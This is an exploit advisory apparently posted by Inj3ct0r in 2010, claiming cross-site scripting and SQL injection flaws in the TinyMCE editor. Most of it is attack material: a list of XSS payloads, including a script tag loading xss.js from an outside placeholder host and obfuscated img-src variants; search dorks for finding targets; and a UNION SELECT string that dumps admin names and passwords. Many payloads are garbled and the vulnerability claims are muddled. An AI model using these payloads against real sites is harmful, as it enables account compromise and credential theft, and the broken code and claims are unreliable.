Security Advisory: TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

[EN] securityvulns.ru
no-pyccku

Related information
 Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
 CORE-2010-0104 - LANDesk OS command injection
 Vulnerability in Tagcloud for DataLife Engine
 JAHx101 - Huski retail mulitple SQL injection vulnerabilities
 JAHx102 - HuskiCMS local file inclusion

From: Inj3ct0r.com <inj3ct0r_(at)_list.ru>
Date: 08.02.2010
Subject: TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility

===================================================================
TinyMCE - Javascript WYSIWYG Editor xss/sql injection vurnerebility
===================================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

[+] Vurnerebility: *Js tiny_mce/tiny_mce WYSIWYG{java script} vurnerebility xss-->popup
 *& SQl implemented
[+] Language : Java--,Xml
[+] lisences : LGPL
[+] Vendor : Moxiecode Systems AB
[+] support : IE7J0/IE6.0/NS8.1-IE/NS8.1-G/FF2.0/O9.02;
[+] vendor : http://tinymce.moxiecode.com/
[+] implemented : joomla componen,drupal..
[+] dork : powered:powered by CMS
 : inurl"file_manager.php?type=img"
---------------------------------------------------------------------------------
---
--[Vulnerability sampling]--
---------------------------------------------------------------------------------
----------------------------------------

---------------------------------------------------------------------------------
----------------------------------------
# alert(String.fromCharCode(X1,X2,X3,
X4))//";alert(String.fromCharCode(X1,X2,X3,
x4))//\";
 alert(String.fromCharCode(X1,X2,X3,x4))//--
></SCRIPT>">'><SCRIPT>alert(String.
fromCharCode(X1,X2,X3,x4))</SCRIPT>
#
---------------------------------------------------------------------------------
----------------------------------------
# '';!--"<XSS>=&{()}'
---------------------------------------------------------------------------------
---
 <script SRC=http//:server.com/xss.js></put_SCRIPT>
 <a hreef="http://www.server://www.server.com/server.
com/">put_code</a>
 <a href="http://www.server.com./">put_code</a>
 <marquee>http://server.net">put_code</marquee>
 <a href="//srver.net">put_code</A>
 <a href="http://0x1x.01x0061.0x6/">put_code</a>
---------------------------------------------------------------------------------
---
 [Thread img src]

 "<img src=javascript:alert("XSS")>"
 "<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
 "<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,
X4))>"
 "<img src=`javascript:alert("put_xss")`>"
 "<IMG SRC="jav ascript:alert('XSS');">"

 <IMG
 SRC
 =
 "
 write javascript vertikal position exmpl:
 j
 s
 :
 a
 l
 e
 r
 t
 (
 '
 put code vertical position
 '
 )
 )
 ;
 >

 "<IMG SRC=>"

try conversion---->use RainbowText from <IMG SRC=>
make compilign:
<IMG SRC=&#1;&#2;&#3;&#3>
---------------------------------------------------------------------------------
----------------------------------------------------------------------------

SQL implemented:Injection vulnerability---->installed on c-panel(joomla---sampling write tabel view/editor)

Exploit :server/patch/index.php?menuID=-value union
select//**//users/2,3,4,5/password//**//from/2,3,4,5//,Group_CONCAT(name,
CHAR(3,4,5),wachtwoord),2,3 from admin--

# ~ - [ [ : Inj3ct0r : ] ]

test server